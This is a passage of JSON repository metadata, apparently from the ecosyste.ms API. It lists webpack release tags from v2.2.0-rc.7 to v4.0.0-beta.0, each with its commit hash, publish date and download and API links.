d581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.co